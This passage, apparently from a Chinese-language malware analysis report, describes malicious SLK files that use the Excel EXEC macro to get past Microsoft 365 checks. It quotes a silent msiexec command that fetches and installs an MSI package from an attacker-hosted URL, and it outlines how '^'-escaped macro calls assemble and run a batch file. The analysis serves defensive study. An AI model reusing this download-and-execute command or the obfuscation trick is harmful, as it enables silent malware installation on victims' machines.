图 2-4 样本内容
此类样本均采用Excel宏函数EXEC来执行其中的参数,不过攻击者采用了针对性的方法可绕过Microsoft 365安全性检测,该宏最终可在Windows计算机上运行如下命令,以静默模式运行Windows Installer(msiexec)安装他们决定在其站点上托管的任何MSI软件包。
msiexec /i http://investinyouproject.com/blocked.php /q
2.2.2 恶意文件工作机理
1. 在SLK文件中调用Excel宏函数EXEC执行命令;
2. 多次调用宏命令,通过命令行转义字符“^”来混淆脚本。其中第一个宏命令使用字符‘Ms’创建一个批处理文件:
第二个宏命令添加msiexec命令剩余字符及URL前部分:
第三个宏命令添加URL剩余部分:
第四个宏命令运行该批处理文件;
